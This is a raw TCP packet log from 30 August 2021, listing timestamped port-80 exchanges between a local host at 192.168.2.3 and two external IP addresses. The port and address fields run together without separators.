                                                                                                                                                                                                    Aug 30, 2021 10:14:23.089957952 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.089970112 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.089972973 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.089976072 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090019941 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090046883 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090070963 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090080023 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090099096 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090100050 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090123892 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090174913 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090188026 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090197086 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090200901 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090250015 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090254068 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090256929 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090306997 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090326071 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090339899 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090363979 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090387106 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090387106 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090393066 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090410948 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090425014 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090434074 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090456963 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090460062 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090465069 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090491056 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090513945 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090528011 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090533972 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090537071 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090558052 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090578079 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.090619087 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120034933 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120073080 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120098114 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120121956 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120145082 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120168924 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120181084 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120192051 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120198011 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120201111 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120215893 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120229006 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120239973 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120266914 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120290995 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120292902 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120299101 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120312929 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120336056 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120345116 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120348930 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120358944 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120382071 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120404959 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120405912 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120410919 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120428085 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120454073 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120465994 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120471001 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120479107 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120501041 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120522976 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120523930 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120527983 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120548010 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120570898 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120573044 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120575905 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120594025 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120613098 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120632887 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120635986 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120639086 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120663881 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120686054 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120693922 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120699883 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120708942 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120755911 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.120759964 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.171679974 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.171705961 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.171722889 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.171737909 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.171753883 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.171772957 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.171789885 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.171802044 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.171813011 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.171822071 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.171828985 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.171880007 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.172684908 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.213293076 CEST4971080192.168.2.3203.228.9.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:23.471784115 CEST8049710203.228.9.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.424407005 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.478974104 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.479157925 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.479751110 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.753520012 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.754343033 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.754487991 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.757198095 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.757345915 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.810872078 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.811096907 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.811256886 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.813018084 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.813114882 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.813460112 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.813546896 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.867439032 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.867476940 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.867592096 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.867651939 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.868645906 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.868683100 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.868731022 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.868772030 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.870253086 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.870455027 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.870476007 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.870569944 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.870908976 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.870940924 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.871033907 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.871052027 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.924076080 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.924139977 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.924272060 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.924582005 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.924649000 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.924668074 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.924688101 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.924773932 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.925338984 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.925436020 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.925616026 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.925693035 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.926075935 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.926100016 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.926168919 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.926196098 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.927927971 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.927958965 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.928033113 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.928067923 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.928556919 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.928581953 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.928659916 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.930551052 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.930655956 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.984556913 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.984591961 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.984738111 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.984952927 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.984976053 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.985055923 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.985116005 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.985460997 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.985568047 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.986016989 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.986155987 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.986402035 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.986428976 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.986483097 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.986510038 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.986994028 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.987070084 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.987819910 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.987845898 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.987926006 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.988039017 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.988097906 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.988107920 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.988415003 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.988501072 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.989362001 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.989393950 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.989417076 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.989453077 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.989483118 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.990365028 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.990400076 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.990447044 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.990523100 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.990902901 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.990935087 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.991004944 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.991039038 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.992073059 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.992101908 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.992189884 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.992353916 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.992402077 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.992424011 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.992466927 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.992883921 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.992908001 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.992960930 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.992989063 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.993859053 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.993891001 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.993947983 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:30.993983030 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.044667959 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.044712067 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.044801950 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.044842958 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.045001984 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.045033932 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.045097113 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.045732975 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.045984983 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.046341896 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.046432972 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.046678066 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.046705961 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.046746969 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.046770096 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.047420025 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.047447920 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.047509909 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.048008919 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.048039913 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.048085928 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.048119068 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.048867941 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.048901081 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.048963070 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.048981905 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.049480915 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.049638987 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.049880981 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.049911976 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.049958944 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.049983978 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.050450087 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.050537109 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.051192045 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.051223040 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.051275969 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.051292896 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.051989079 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.052026987 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.052061081 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.052083015 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.052419901 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.052608013 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.052968979 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.052992105 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.053128004 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.054022074 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.054048061 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.054110050 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.054335117 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.054352999 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.054389954 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.054428101 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.055197954 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.055258036 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.055391073 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.055409908 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.055464983 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.056340933 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.056361914 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.056406975 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.056885004 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.056905985 CEST804971694.190.187.102192.168.2.3
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.056934118 CEST4971680192.168.2.394.190.187.102
                                                                                                                                                                                                    Aug 30, 2021 10:14:31.056968927 CEST4971680192.168.2.394.190.187.102
